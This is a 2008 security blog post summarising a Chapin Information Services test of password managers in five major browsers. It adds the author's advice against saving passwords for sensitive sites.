Chapin Information Services - Password Management Tested on 5 browsers - Security Protection

Common Tasks

Community

Email Notifications

Personal Links

Security Protection - Harry Waldron (CS)

Security Best Practices, Breaking News, & Updates

Chapin Information Services - Password Management Tested on 5 browsers

Idea The detailed test results are interesting. They point to improvements that all five major browsers should look at in the future.

However, users should avoid storing browser passwords anyway for sensitive sites (esp. e-commerce, banking, etc). It's a better practice to reenter ID and password credentials each time, in case someone gains access to your PC. The rentry process also helps in better remembering the password.

Conversely, financial websites should be programmed to avoid capturing password fields by the browser. Many sensitive sites are constructed in this manner where passwords are form fields and require multiple screens to enter. This technique prevents the ID and password from being stored.

Chapin Information Services - Browser Password Management Tests
http://www.info-svc.com/news/2008/12-12/
http://www.eweek.com/c/a/Security/Google-Chrome-and-Apple-Safari-Lead-Poor-Showing-by-Browsers-in-Password-Management-Test/

QUOTE: The company took a look at all the major browsers: Internet Explorer 7, Opera 9.62, Firefox 3.04, Safari 3.2 and Google Chrome. According to the study, each browser was susceptible to a number of vulnerabilities that could expose password information.

Of the five, Opera Software's Opera and Mozilla Firefox fared the best—meaning they passed seven of the 21 tests. Internet Explorer passed five tests, while Google Chrome and Apple Safari passed only two.

Three issues were cited by CIS as being problems that, when combined, could allow cyber-thieves to steal passwords without a user's knowledge. The first two are whether the browsers check the destination where passwords are sent and the locations where they are requested

The third critical issue is whether the password manager delivers a password using a form that is not visible. If an attacker can put an invisible password form on the page and count on the password manager to fill in the form, it is possible to steal a user's password without the user ever knowing, Chapin explained.

Posted: Dec 17 2008, 01:58 PM by Harry Waldron | with no comments

Questions? Contact Susan at Susan-at-msmvps.com. Each post's copyright held by the original author. All rights reserved. Blog site is an independent site not sponsored by Microsoft.
Our servers would like to thank www.ownwebnow.com and www.exchangedefender.com. We wouldn't be here without the generosity of Vlad Mazek and his companies.

Powered by Community Server (Commercial Edition), by Telligent Systems

Theme based on the Paperclip Blog Theme included in Community Server.
Enhanced to a Site-Wide Theme by Interscape Technologies.